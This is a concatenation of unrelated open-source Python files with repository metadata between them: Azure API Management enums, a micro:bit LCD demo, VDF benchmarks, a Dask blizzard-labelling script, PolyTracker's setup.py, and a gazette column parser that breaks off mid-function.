HTTP = "http"
HTTPS = "https"
WS = "ws"
WSS = "wss"
class PublicNetworkAccess(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Whether or not public endpoint access is allowed for this API Management service. Value is
optional but if passed in, must be 'Enabled' or 'Disabled'. If 'Disabled', private endpoints
are the exclusive access method. Default value is 'Enabled'
"""
ENABLED = "Enabled"
DISABLED = "Disabled"
class ResourceSkuCapacityScaleType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The scale type applicable to the sku.
"""
#: Supported scale type automatic.
AUTOMATIC = "automatic"
#: Supported scale type manual.
MANUAL = "manual"
#: Scaling not supported.
NONE = "none"
class SamplingType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Sampling type.
"""
#: Fixed-rate sampling.
FIXED = "fixed"
class SchemaType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Schema Type. Immutable.
"""
#: Xml schema type.
XML = "xml"
#: Json schema type.
JSON = "json"
class SettingsTypeName(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
PUBLIC = "public"
class Severity(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The severity of the issue.
"""
ERROR = "Error"
WARNING = "Warning"
class SkuType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Name of the Sku.
"""
#: Developer SKU of Api Management.
DEVELOPER = "Developer"
#: Standard SKU of Api Management.
STANDARD = "Standard"
#: Premium SKU of Api Management.
PREMIUM = "Premium"
#: Basic SKU of Api Management.
BASIC = "Basic"
#: Consumption SKU of Api Management.
CONSUMPTION = "Consumption"
#: Isolated SKU of Api Management.
ISOLATED = "Isolated"
class SoapApiType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Type of API to create.
* ``http`` creates a REST API
* ``soap`` creates a SOAP pass-through API
* ``websocket`` creates websocket API
* ``graphql`` creates GraphQL API.
"""
#: Imports a SOAP API having a RESTful front end.
SOAP_TO_REST = "http"
#: Imports the SOAP API having a SOAP front end.
SOAP_PASS_THROUGH = "soap"
#: Imports the API having a Websocket front end.
WEB_SOCKET = "websocket"
#: Imports the API having a GraphQL front end.
GRAPH_QL = "graphql"
class State(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Status of the issue.
"""
#: The issue is proposed.
PROPOSED = "proposed"
#: The issue is opened.
OPEN = "open"
#: The issue was removed.
REMOVED = "removed"
#: The issue is now resolved.
RESOLVED = "resolved"
#: The issue was closed.
CLOSED = "closed"
class SubscriptionState(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Subscription state. Possible states are * active – the subscription is active, * suspended –
the subscription is blocked, and the subscriber cannot call any APIs of the product, *
submitted – the subscription request has been made by the developer, but has not yet been
approved or rejected, * rejected – the subscription request has been denied by an
administrator, * cancelled – the subscription has been cancelled by the developer or
administrator, * expired – the subscription reached its expiration date and was deactivated.
"""
SUSPENDED = "suspended"
ACTIVE = "active"
EXPIRED = "expired"
SUBMITTED = "submitted"
REJECTED = "rejected"
CANCELLED = "cancelled"
class TemplateName(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
APPLICATION_APPROVED_NOTIFICATION_MESSAGE = "applicationApprovedNotificationMessage"
ACCOUNT_CLOSED_DEVELOPER = "accountClosedDeveloper"
QUOTA_LIMIT_APPROACHING_DEVELOPER_NOTIFICATION_MESSAGE = "quotaLimitApproachingDeveloperNotificationMessage"
NEW_DEVELOPER_NOTIFICATION_MESSAGE = "newDeveloperNotificationMessage"
EMAIL_CHANGE_IDENTITY_DEFAULT = "emailChangeIdentityDefault"
INVITE_USER_NOTIFICATION_MESSAGE = "inviteUserNotificationMessage"
NEW_COMMENT_NOTIFICATION_MESSAGE = "newCommentNotificationMessage"
CONFIRM_SIGN_UP_IDENTITY_DEFAULT = "confirmSignUpIdentityDefault"
NEW_ISSUE_NOTIFICATION_MESSAGE = "newIssueNotificationMessage"
PURCHASE_DEVELOPER_NOTIFICATION_MESSAGE = "purchaseDeveloperNotificationMessage"
PASSWORD_RESET_IDENTITY_DEFAULT = "passwordResetIdentityDefault"
PASSWORD_RESET_BY_ADMIN_NOTIFICATION_MESSAGE = "passwordResetByAdminNotificationMessage"
REJECT_DEVELOPER_NOTIFICATION_MESSAGE = "rejectDeveloperNotificationMessage"
REQUEST_DEVELOPER_NOTIFICATION_MESSAGE = "requestDeveloperNotificationMessage"
class UserState(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Account state. Specifies whether the user is active or not. Blocked users are unable to sign
into the developer portal or call any APIs of subscribed products. Default state is Active.
"""
#: User state is active.
ACTIVE = "active"
#: User is blocked. Blocked users cannot authenticate at developer portal or call API.
BLOCKED = "blocked"
#: User account is pending. Requires identity confirmation before it can be made active.
PENDING = "pending"
#: User account is closed. All identities and related entities are removed.
DELETED = "deleted"
class Verbosity(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The verbosity level applied to traces emitted by trace policies.
"""
#: All the traces emitted by trace policies will be sent to the logger attached to this diagnostic
#: instance.
VERBOSE = "verbose"
#: Traces with 'severity' set to 'information' and 'error' will be sent to the logger attached to
#: this diagnostic instance.
INFORMATION = "information"
#: Only traces with 'severity' set to 'error' will be sent to the logger attached to this
#: diagnostic instance.
ERROR = "error"
class VersioningScheme(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""An value that determines where the API Version identifier will be located in a HTTP request.
"""
#: The API Version is passed in a path segment.
SEGMENT = "Segment"
#: The API Version is passed in a query parameter.
QUERY = "Query"
#: The API Version is passed in a HTTP header.
HEADER = "Header"
class VirtualNetworkType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The type of VPN in which API Management service needs to be configured in. None (Default Value)
means the API Management service is not part of any Virtual Network, External means the API
Management deployment is set up inside a Virtual Network having an Internet Facing Endpoint,
and Internal means that API Management deployment is setup inside a Virtual Network having an
Intranet Facing Endpoint only.
"""
#: The service is not part of any Virtual Network.
NONE = "None"
#: The service is part of Virtual Network and it is accessible from Internet.
EXTERNAL = "External"
#: The service is part of Virtual Network and it is only accessible from within the virtual
#: network.
INTERNAL = "Internal"
| 36.536313
| 123
| 0.718425
| 25,467
| 0.972988
| 0
| 0
| 0
| 0
| 0
| 0
| 15,275
| 0.583594
|
b197033d00037d8ccf26822dfa92949370b97250
| 308
|
py
|
Python
|
lcd_rom_small.py
|
rhubarbdog/microbit-LCD-driver
|
d1a7f5cf3c4cfe825da873ae1a25b5765fe8ca3e
|
[
"MIT"
] | 2
|
2020-11-23T20:27:03.000Z
|
2021-11-04T12:08:10.000Z
|
lcd_rom_small.py
|
rhubarbdog/microbit-LCD-driver
|
d1a7f5cf3c4cfe825da873ae1a25b5765fe8ca3e
|
[
"MIT"
] | 1
|
2021-12-14T10:47:00.000Z
|
2021-12-14T12:02:08.000Z
|
lcd_rom_small.py
|
rhubarbdog/microbit-LCD-driver
|
d1a7f5cf3c4cfe825da873ae1a25b5765fe8ca3e
|
[
"MIT"
] | null | null | null |
from microbit import *
import microbit_i2c_lcd as lcd
i2c.init(sda=pin15,scl=pin13)
display = lcd.lcd(i2c)
display.lcd_display_string(chr(247), 1)
print("this will display a pi symbol for the A00 ROM (Japanese)\n"+\
      "and a divide symbol for the A02 ROM (European)")
i2c.init(sda=pin20,scl=pin19)
| 23.692308
| 63
| 0.746753
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 105
| 0.340909
|
b19975a6c0f70cdf1b6594a54b946673ec51a754
| 11,349
|
py
|
Python
|
benchmarks/benchmarks.py
|
alanefl/vdf-competition
|
84efc3aec180c43582c9421c6fb7fb2e22000635
|
[
"Apache-2.0"
] | 97
|
2018-10-04T18:10:42.000Z
|
2021-08-23T10:37:06.000Z
|
benchmarks/benchmarks.py
|
alanefl/vdf-competition
|
84efc3aec180c43582c9421c6fb7fb2e22000635
|
[
"Apache-2.0"
] | 4
|
2018-10-04T18:20:49.000Z
|
2021-05-03T07:13:14.000Z
|
benchmarks/benchmarks.py
|
alanefl/vdf-competition
|
84efc3aec180c43582c9421c6fb7fb2e22000635
|
[
"Apache-2.0"
] | 17
|
2018-10-08T18:08:21.000Z
|
2022-01-12T00:54:32.000Z
|
import time
import textwrap
import math
import binascii
from inkfish.create_discriminant import create_discriminant
from inkfish.classgroup import ClassGroup
from inkfish.iterate_squarings import iterate_squarings
from inkfish import proof_wesolowski
from inkfish.proof_of_time import (create_proof_of_time_nwesolowski,
check_proof_of_time_nwesolowski,
generate_r_value)
from inkfish import proof_pietrzak
from tests.int_mod_n import int_mod_n
start_t = 0
time_multiplier = 1000 # Use milliseconds
def start_bench():
global start_t
start_t = time.time() * time_multiplier
def end_bench(name, iterations):
global start_t
print("%-80s" % name, round(((time.time() * time_multiplier) - start_t)
/ (iterations), 2), "ms")
def bench_classgroup():
D = create_discriminant(b"seed", 512)
g = ClassGroup.from_ab_discriminant(2, 1, D)
while g[0].bit_length() < g[2].bit_length() or g[1].bit_length() < g[2].bit_length():
g = pow(g, 2)
g2 = pow(g, 2)
start_bench()
for _ in range(0, 10000):
g2 = g2.multiply(g)
end_bench("Classgroup 512 bit multiply", 10000)
start_bench()
for _ in range(0, 10000):
g2 = g2.square()
end_bench("Classgroup 512 bit square", 10000)
D = create_discriminant(b"seed", 1024)
g = ClassGroup.from_ab_discriminant(2, 1, D)
while g[0].bit_length() < g[2].bit_length() or g[1].bit_length() < g[2].bit_length():
g = pow(g, 2)
g2 = pow(g, 2)
start_bench()
for _ in range(0, 10000):
g2 = g2.multiply(g)
end_bench("Classgroup 1024 bit multiply", 10000)
start_bench()
for _ in range(0, 10000):
g2 = g2.square()
end_bench("Classgroup 1024 bit square", 10000)
D = create_discriminant(b"seed", 2048)
g = ClassGroup.from_ab_discriminant(2, 1, D)
while g[0].bit_length() < g[2].bit_length() or g[1].bit_length() < g[2].bit_length():
g = pow(g, 2)
g2 = pow(g, 2)
start_bench()
for _ in range(0, 10000):
g2 = g2.multiply(g)
end_bench("Classgroup 2048 bit multiply", 10000)
start_bench()
for _ in range(0, 10000):
g2 = g2.square()
end_bench("Classgroup 2048 bit square", 10000)
def bench_discriminant_generation():
start_bench()
for i in range(100):
create_discriminant(i.to_bytes(32, "big"), 512)
end_bench("Generate 512 bit discriminant", 100)
start_bench()
for i in range(100):
create_discriminant(i.to_bytes(32, "big"), 1024)
end_bench("Generate 1024 bit discriminant", 100)
start_bench()
for i in range(100):
create_discriminant(i.to_bytes(32, "big"), 2048)
end_bench("Generate 2048 bit discriminant", 100)
def bench_vdf_iterations():
D = create_discriminant(b"seed", 512)
g = ClassGroup.from_ab_discriminant(2, 1, D)
start_bench()
for _ in range(10):
iterate_squarings(g, [10000])
end_bench("VDF 10000 iterations, 512bit classgroup", 10)
D = create_discriminant(b"seed", 1024)
g = ClassGroup.from_ab_discriminant(2, 1, D)
start_bench()
for _ in range(2):
iterate_squarings(g, [10000])
end_bench("VDF 10000 iterations, 1024bit classgroup", 2)
D = create_discriminant(b"seed", 2048)
g = ClassGroup.from_ab_discriminant(2, 1, D)
start_bench()
for _ in range(2):
iterate_squarings(g, [10000])
end_bench("VDF 10000 iterations, 2048bit classgroup", 2)
# 2048 bit modulus
prime = int(''.join(textwrap.dedent("""
2634427397878110232503205795695468045251992992603340168049253044454387
1080897872360133472596339100961569230393163880927301060812730934043766
3646941725034559080490451986171041751558689035115943134790395616490035
9846986660803055891526943083539429058955074960014718229954545667371414
8029627597753998530121193913181474174423003742206534823264658175666814
0135440982296559552013264268674093709650866928458407571602481922443634
2306826340229149641664159565679297958087282612514993965471602016939198
7906354607787482381087158402527243744342654041944357821920600344804411
149211019651477131981627171025001255607692340155184929729""").split(
"\n")))
initial_x = int_mod_n(15619920774592561628351138998371642294622340518469892832433140464182509560910157, prime)
start_bench()
for _ in range(2):
iterate_squarings(initial_x, [10000])
end_bench("VDF 10000 iterations, 2048bit RSA modulus", 2)
# 4096 bit modulus
prime = int(''.join(textwrap.dedent("""
8466908771297228398108729385413406312941234872779790501232479567685076
4762372651919166693555570188656362906279057098994287649807661604067499
3053172889374223358861501556862285892231110003666671700028271837785598
2711897721600334848186874197010418494909265899320941516493102418008649
1453168421248338831347183727052419170386543046753155080120058844782449
2367606252473029574371603403502901208633055707823115620627698680602710
8443465519855901353485395338769455628849759950055397510380800451786140
7656499749760023191493764704430968335226478156774628814806959050849093
5035645687560103462845054697907307302184358040130405297282437884344166
7188530230135000709764482573583664708281017375197388209508666190855611
3020636147999796942848529907410787587958203267319164458728792653638371
7065019972034334447374200594285558460255762459285837794285154075321806
4811493971019446075650166775528463987738853022894781860563097254152754
1001763544907553312158598519824602240430350073539728131177239628816329
0179188493240741373702361870220590386302554494325819514615309801491107
2710093592877658471507118356670261129465668437063636041245619411937902
0658733974883998301959084381087966405508661151837877497650143949507846
1522640311670422105209760172585337397687461""").split("\n")))
initial_x = int_mod_n(15619920774592561628351138998371642294622340518469892832433140464182509560910157, prime)
start_bench()
for _ in range(2):
iterate_squarings(initial_x, [10000])
end_bench("VDF 10000 iterations, 4096bit RSA modulus", 2)
def bench_wesolowski():
iterations = 10000
discriminant_length = 512
discriminant = create_discriminant(b"seed", discriminant_length)
L, k, _ = proof_wesolowski.approximate_parameters(iterations)
x = ClassGroup.from_ab_discriminant(2, 1, discriminant)
powers_to_calculate = [i * k * L for i in range(0, math.ceil(iterations/(k*L)) + 1)]
powers_to_calculate += [iterations]
start_t = time.time() * time_multiplier
powers = iterate_squarings(x, powers_to_calculate)
vdf_time = round(time.time() * time_multiplier - start_t)
y = powers[iterations]
identity = ClassGroup.identity_for_discriminant(discriminant)
start_t = time.time() * time_multiplier
start_bench()
for _ in range(5):
proof = proof_wesolowski.generate_proof(identity, x, y, iterations, k, L, powers)
end_bench("Wesolowski " + str(discriminant_length) + "b class group, " + str(iterations)
+ " iterations, proof", 5)
proof_time = round((time.time() * time_multiplier - start_t) / 5)
print(" - Percentage of VDF time:", (proof_time / vdf_time) * 100, "%")
start_bench()
for _ in range(10):
assert(proof_wesolowski.verify_proof(x, y, proof, iterations))
end_bench("Wesolowski " + str(discriminant_length) + "b class group, " + str(iterations)
+ " iterations, verification", 10)
def bench_nwesolowski():
iterations = 10000
discriminant_length = 512
discriminant = create_discriminant(b"seed", discriminant_length)
L, k, _ = proof_wesolowski.approximate_parameters(iterations)
x = ClassGroup.from_ab_discriminant(2, 1, discriminant)
powers_to_calculate = [i * k * L for i in range(0, math.ceil(iterations/(k*L)) + 1)]
start_t = time.time() * time_multiplier
for _ in range(20):
iterate_squarings(x, powers_to_calculate)
vdf_time = round(time.time() * time_multiplier - start_t) / 20
start_t = time.time() * time_multiplier
start_bench()
for _ in range(20):
result, proof = create_proof_of_time_nwesolowski(discriminant, x, iterations,
discriminant_length, 2, depth=0)
end_bench("n-wesolowski depth 2 " + str(discriminant_length) + "b class group, "
+ str(iterations) + " iterations, proof", 20)
proof_time = round((time.time() * time_multiplier - start_t) / 20)
print(" - Percentage of VDF time:", (((proof_time - vdf_time) / vdf_time) * 100), "%")
start_bench()
for _ in range(20):
assert(check_proof_of_time_nwesolowski(discriminant, x, result + proof, iterations, discriminant_length))
end_bench("n-wesolowski depth 2 " + str(discriminant_length) + "b class group, "
+ str(iterations) + " iterations, verification", 20)
def bench_pietrzak():
iterations = 10000
discriminant_length = 512
discriminant = create_discriminant(b"seed", discriminant_length)
delta = 8
x = ClassGroup.from_ab_discriminant(2, 1, discriminant)
powers_to_calculate = proof_pietrzak.cache_indeces_for_count(iterations)
start_t = time.time() * time_multiplier
powers = iterate_squarings(x, powers_to_calculate)
vdf_time = round(time.time() * time_multiplier - start_t)
y = powers[iterations]
identity = ClassGroup.identity_for_discriminant(discriminant)
start_t = time.time() * time_multiplier
start_bench()
for _ in range(5):
proof = proof_pietrzak.generate_proof(x, iterations, delta, y, powers,
identity, generate_r_value, discriminant_length)
end_bench("Pietrzak " + str(discriminant_length) + "b class group, " + str(iterations)
+ " iterations, proof", 10)
proof_time = round((time.time() * time_multiplier - start_t) / 10)
print(" - Percentage of VDF time:", (proof_time / vdf_time) * 100, "%")
start_bench()
for _ in range(10):
assert(proof_pietrzak.verify_proof(x, y, proof, iterations, delta,
generate_r_value, discriminant_length))
end_bench("Pietrzak " + str(discriminant_length) + "b class group, " + str(iterations)
+ " iterations, verification", 10)
def bench_main():
bench_classgroup()
bench_discriminant_generation()
bench_vdf_iterations()
bench_wesolowski()
bench_nwesolowski()
bench_pietrzak()
if __name__ == '__main__':
bench_main()
"""
Copyright 2018 Chia Network Inc
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
| 38.602041
| 114
| 0.707639
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,752
| 0.330602
|
b19995883a43664eea79cdbbf4ebcc8afcf1f9f2
| 2,415
|
py
|
Python
|
ccl_dask_blizzard.py
|
michaelleerilee/CCL-M2BLIZZARD
|
ff936647d69c5e83553b55d84d7b3a0636290c77
|
[
"BSD-3-Clause"
] | null | null | null |
ccl_dask_blizzard.py
|
michaelleerilee/CCL-M2BLIZZARD
|
ff936647d69c5e83553b55d84d7b3a0636290c77
|
[
"BSD-3-Clause"
] | null | null | null |
ccl_dask_blizzard.py
|
michaelleerilee/CCL-M2BLIZZARD
|
ff936647d69c5e83553b55d84d7b3a0636290c77
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
from load_for_ccl_inputs import load_for_ccl_inputs
from ccl_marker_stack import ccl_dask
base = '/home/mrilee/nobackup/tmp/others/'
fnames = None
if False:
fnames = ['ccl-inputs-globe-122736+23.csv.gz']
if False:
fnames = ['ccl-inputs-globe-122736+23.csv.gz'
,'ccl-inputs-globe-122760+23.csv.gz']
if True:
fnames = ['ccl-inputs-globe-122736+23.csv.gz'
,'ccl-inputs-globe-122760+23.csv.gz'
,'ccl-inputs-globe-122784+23.csv.gz'
,'ccl-inputs-globe-122808+23.csv.gz'
,'ccl-inputs-globe-122832+23.csv.gz'
,'ccl-inputs-globe-122856+23.csv.gz'
,'ccl-inputs-globe-122880+23.csv.gz'
,'ccl-inputs-globe-122904+23.csv.gz']
file_fpnames = [base+fname for fname in fnames]
print('file_fpnames: ', file_fpnames)
# quit()
###########################################################################
# Load
# precsno_arr, visibility_arr = load_for_ccl_inputs(file_name)
# For extinction, 1/visibility.
thresh_mnmx = (1.0e-3,1.0)
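# Minimal sketch (not called below) of how the extinction threshold acts on a
# visibility field: extinction is 1/visibility, and a cell is in the CCL input
# band when thresh_mnmx[0] <= extinction <= thresh_mnmx[1]. 'visibility' is a
# hypothetical NumPy array argument, not a variable defined in this script.
def extinction_in_band(visibility, band=(1.0e-3, 1.0)):
    extinction = 1.0 / visibility
    return (extinction >= band[0]) & (extinction <= band[1])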
# The calculation
if True:
ccl_dask_object = ccl_dask()
    ccl_dask_object.load_data_segments_with_loader(load_for_ccl_inputs, file_fpnames, [('visibility_i', np.nan, float)])
# Diagnostics
if False:
    print('ccl_dask_object.data_segs', ccl_dask_object.data_segs)
    print('execute')
    ccl_dask_object.data_segs[0].result()
    print('ccl_dask_object.data_segs', ccl_dask_object.data_segs)
if True:
ccl_dask_object.make_stacks(thresh_mnmx)
ccl_dask_object.shift_labels()
ccl_dask_object.make_translations()
ccl_dask_object.apply_translations()
if False:
    print('ccl_dask_object.data_segs[0].result()[0]\n',
          ccl_dask_object.data_segs[0].result()[0])
if True:
np.set_printoptions(threshold=5000,linewidth=600)
    print('ccl_dask_object.ccl_results[0].m_results_translated[0][0:60,0:60]\n',
          ccl_dask_object.ccl_results[0].m_results_translated[0][0:60,0:60])
np.set_printoptions(threshold=1000,linewidth=75)
ccl_dask_object.close()
# Note: if we have to do the 3-hour blizzard calculation without CCL, then we can adapt
# load_data_segments to load files onto separate cluster nodes, like ghost cells.
# Alternatively, we can Dask it by submitting tasks via client.submit with dependencies
# on the two adjacent futures, as sketched below.
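# Minimal sketch of that client.submit alternative, assuming a dask.distributed
# Client and a hypothetical combine() function (neither is set up in this script);
# passing futures as arguments makes Dask run the task only after both complete,
# preferably on a worker that already holds their data.
# from dask.distributed import Client
# client = Client()
# fut_a = client.submit(load_for_ccl_inputs, file_fpnames[0])
# fut_b = client.submit(load_for_ccl_inputs, file_fpnames[1])
# fut_ab = client.submit(combine, fut_a, fut_b)  # scheduled after fut_a and fut_b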
| 30.56962
| 119
| 0.670807
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,127
| 0.466667
|
b19b15001ce2daedc7edc47219f748a11fbd096b
| 3,108
|
py
|
Python
|
setup.py
|
RiS3-Lab/polytracker
|
2ea047738717ff0c22e3b157934667c9ed84fa6f
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
RiS3-Lab/polytracker
|
2ea047738717ff0c22e3b157934667c9ed84fa6f
|
[
"Apache-2.0"
] | 1
|
2020-09-01T15:58:13.000Z
|
2021-01-18T16:24:56.000Z
|
setup.py
|
RiS3-Lab/polytracker
|
2ea047738717ff0c22e3b157934667c9ed84fa6f
|
[
"Apache-2.0"
] | null | null | null |
import os
import re
import sys
from setuptools import setup, find_packages
from typing import Optional, Tuple
SETUP_DIR = os.path.dirname(os.path.realpath(__file__))
POLYTRACKER_HEADER = os.path.join(SETUP_DIR, 'polytracker', 'include', 'polytracker', 'polytracker.h')
if not os.path.exists(POLYTRACKER_HEADER):
sys.stderr.write(f"Error loading polytracker.h!\nIt was expected to be here:\n{POLYTRACKER_HEADER}\n\n")
exit(1)
def polytracker_version() -> Tuple[int, int, int, Optional[str]]:
version_parts = {}
with open(POLYTRACKER_HEADER, 'r') as f:
for i, line in enumerate(f):
m = re.match(r"\s*#define\s+POLYTRACKER_VERSION_([A-Za-z_0-9]+)\s+([^\s]+)\s*$", line)
if m:
if m[1] not in ('MAJOR', 'MINOR', 'REVISION', 'SUFFIX'):
sys.stderr.write(f"Warning: Ignoring unexpected #define for \"POLYTRACKER_VERSION_{m[1]}\" on line "
f"{i + 1} of {POLYTRACKER_HEADER}\n")
else:
version_parts[m[1]] = m[2]
for required_part in ('MAJOR', 'MINOR', 'REVISION'):
if required_part not in version_parts:
sys.stderr.write(
f"Error: #define POLYTRACKER_VERSION_{required_part} not found in {POLYTRACKER_HEADER}\n\n")
sys.exit(1)
try:
version_parts[required_part] = int(version_parts[required_part])
except ValueError:
sys.stderr.write(
f"Error: POLYTRACKER_VERSION_{required_part} in {POLYTRACKER_HEADER} is not an integer!\n\n")
sys.exit(1)
suffix = version_parts.get('SUFFIX', None)
if suffix is not None:
suffix = suffix.strip()
if suffix.startswith('"') and suffix.endswith('"'):
suffix = suffix[1:-1]
return version_parts['MAJOR'], version_parts['MINOR'], version_parts['REVISION'], suffix
def polytracker_version_string() -> str:
*primary, suffix = polytracker_version()
primary = map(str, primary)
if suffix is None:
return '.'.join(primary)
else:
return f"{'.'.join(primary)}{suffix}"
setup(
name='polytracker',
description='API and Library for operating and interacting with PolyTracker',
url='https://github.com/trailofbits/polytracker',
author='Trail of Bits',
version=polytracker_version_string(),
packages=find_packages(),
python_requires='>=3.7',
install_requires=[
'graphviz',
'matplotlib',
'networkx',
'pygraphviz',
'pydot',
'tqdm',
'typing_extensions'
],
extras_require={
"dev": ["black", "mypy", "pytest"]
},
entry_points={
'console_scripts': [
'polyprocess = polytracker.polyprocess.__main__:main'
]
},
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 3 :: Only',
'Topic :: Utilities'
]
)
| 35.318182
| 120
| 0.604247
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,161
| 0.373552
|
b19b3f7c4a68fc939bc0e963cc37d4583121c7aa
| 111
|
py
|
Python
|
Game22/modules/online/__init__.py
|
ttkaixin1998/pikachupythongames
|
609a3a5a2be3f5a187c332c7980bb5bb14548f02
|
[
"MIT"
] | 4,013
|
2018-06-16T08:00:02.000Z
|
2022-03-30T11:48:14.000Z
|
Game22/modules/online/__init__.py
|
pigbearcat/Games
|
b8c47ef1bcce9a9db3f3730c162e6e8e08b508a2
|
[
"MIT"
] | 22
|
2018-10-18T00:15:50.000Z
|
2022-01-13T08:16:15.000Z
|
Game22/modules/online/__init__.py
|
pigbearcat/Games
|
b8c47ef1bcce9a9db3f3730c162e6e8e08b508a2
|
[
"MIT"
] | 2,172
|
2018-07-20T04:03:14.000Z
|
2022-03-31T14:18:29.000Z
|
'''Initialization'''
from .server import gobangSever
from .client import gobangClient
from .playOnline import playOnlineUI
| 27.75
| 36
| 0.810811
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 15
| 0.128205
|
b19b4f05269a9c0a51ba854a6b3f0bd1816a6911
| 9,317
|
py
|
Python
|
gazette_processor/gazette.py
|
GabrielTrettel/DiariesProcessor
|
817b4d8d1bbf0fe88b315b159e949fe49a2324f7
|
[
"MIT"
] | 2
|
2020-10-04T19:45:45.000Z
|
2020-10-28T20:21:08.000Z
|
gazette_processor/gazette.py
|
GabrielTrettel/DiariesProcessor
|
817b4d8d1bbf0fe88b315b159e949fe49a2324f7
|
[
"MIT"
] | 6
|
2020-09-25T14:31:12.000Z
|
2020-09-28T13:37:37.000Z
|
gazette_processor/gazette.py
|
GabrielTrettel/DiariesProcessor
|
817b4d8d1bbf0fe88b315b159e949fe49a2324f7
|
[
"MIT"
] | null | null | null |
import os,sys, re
from math import ceil, floor
class Gazette:
"""
Loads and parses municipal gazettes.
Attributes:
file_path: The string path to a gazette.
file: The string containing a gazette's content.
city: A string for the city (or cities) of the gazette.
date: A string for the date of the gazette.
        minimum_spacing_between_cols: An integer for the minimum spacing between columns. Defaults to 1.
        min_break_ratio: A float for min_break_ratio. Defaults to 0.75.
        max_allowed_cols: An int for the maximum number of columns allowed per page.
        split_re: A regex for splitting pages.
        pages: A list of pages, each page is a list of lines.
        cols_dividers: A list, one entry per page, of (column index, break ratio) tuples selected as column dividers.
        pages_avg_col: A list with the number of columns detected on each page.
        total_avg_col: A float for the average number of columns per page.
"""
def __init__(self, file_path:str, city:str, date:str):
"""Inits Gazette with a path, a city and a date."""
self.file = self.load_file(file_path)
self.city = city
self.date = date
self.minimum_spacing_between_cols = 1
self.min_break_ratio = 0.75
self.max_allowed_cols = 5
self.pages = self.get_list_of_pages()
self.linear_text = ""
self.cols_dividers = [self.vertical_lines_finder(x) for x in self.pages]
self.pages_avg_col = [len(x)+1 for x in self.cols_dividers]
# print(self.pages_avg_col)
if self.pages_avg_col:
self.total_avg_col = sum(self.pages_avg_col) / len(self.pages_avg_col)
else:
self.total_avg_col = 0
self.split_cols()
print(self.total_avg_col)
# print(self.linear_text)
def get_list_of_pages(self, page_break='\014'):
"""
Uses file string in self.file and converts it to a list of lists.
Args:
page_break (str): A string used to delimit page separation
in the target document.
Returns:
list: A list of pages, each page is a list of lines.
"""
pages = []
page_buffer = []
for line in self.file:
if page_break not in line:
page_buffer.append(line)
else:
full_page = page_buffer
pages.append(full_page)
page_buffer = self.reset_buffer(line, page_break)
# Add last page
if len(page_buffer) > 0:
pages.append(page_buffer)
return pages
def reset_buffer(self, line, page_break):
return [line.strip(page_break)]
def split_cols(self):
"""
Splits columns of document into a linear layout
"""
column_dividers = self.cols_dividers
average_columns_per_page = self.pages_avg_col
for page_index, page in enumerate(self.pages):
page_column_dividers = column_dividers[page_index]
page_average_columns = average_columns_per_page[page_index]
page_n_of_columns = len(page_column_dividers)
if self.test_if_page_is_not_splittable(page_average_columns, page_column_dividers, page_n_of_columns):
page_add_to_linear_text = str("".join(page)) + '\014'
self.linear_text += page_add_to_linear_text
continue
page_lines_in_one_column = self.get_lines_in_one_column(page, page_column_dividers)
self.linear_text += self.lines_to_text(page_lines_in_one_column)
def get_lines_in_one_column(self, page, page_column_dividers):
"""
Args
page: A list of strings, and each string is a line in the page.
page_column_dividers: A list of ints that were selected as column dividers.
Returns: A list of strings, and each string is a line in the new page.
"""
longest_line_len = max(len(line) for line in page)
page_column_dividers.append((longest_line_len,0))
lines_to_return = []
for line in page:
column_beginning = 0
current_line = []
line_size = len(line)
for column_divider, _ in page_column_dividers:
if line_size > column_divider and line[column_divider] != ' ':
single_column = [line]
lines_to_return.append(single_column)
column_beginning = -1
break
current_column = line[column_beginning:column_divider]
current_line.append(current_column)
column_beginning = column_divider
lines_to_return.append(current_line)
return lines_to_return
def test_if_page_is_not_splittable(self, page_average_columns, page_column_dividers, page_n_of_columns):
"""
Args
            page_average_columns: The number of columns detected on this page.
            page_column_dividers: The candidate column dividers for this page.
            page_n_of_columns: The number of dividers in page_column_dividers.
Returns: boolean
"""
average_columns_in_total = self.total_avg_col
maximum_of_columns_allowed = self.max_allowed_cols
too_many_columns = page_n_of_columns >= maximum_of_columns_allowed
no_dividers = page_column_dividers == []
threshold = 1.2
more_pages_than_average = page_average_columns >= (threshold * average_columns_in_total)
min_columns = 2
too_few_columns = page_average_columns < min_columns
result = more_pages_than_average or \
too_few_columns or \
too_many_columns or \
no_dividers
return result
def lines_to_text(self, lines):
max_cols = max(map(lambda x: len(x), lines))
txt = ""
for col_i in range(max_cols):
page_has_content = False
for line in lines:
if len(line) > col_i:
if line[col_i] != '' and line[col_i].strip() != '':
txt += "".join(line[col_i].strip('\n')) + '\n'
page_has_content = True
if lines != [] and page_has_content:
txt += "\014\n"
return txt[:-1]
def vertical_lines_finder(self, page):
max_line_size = max(len(line) for line in page)
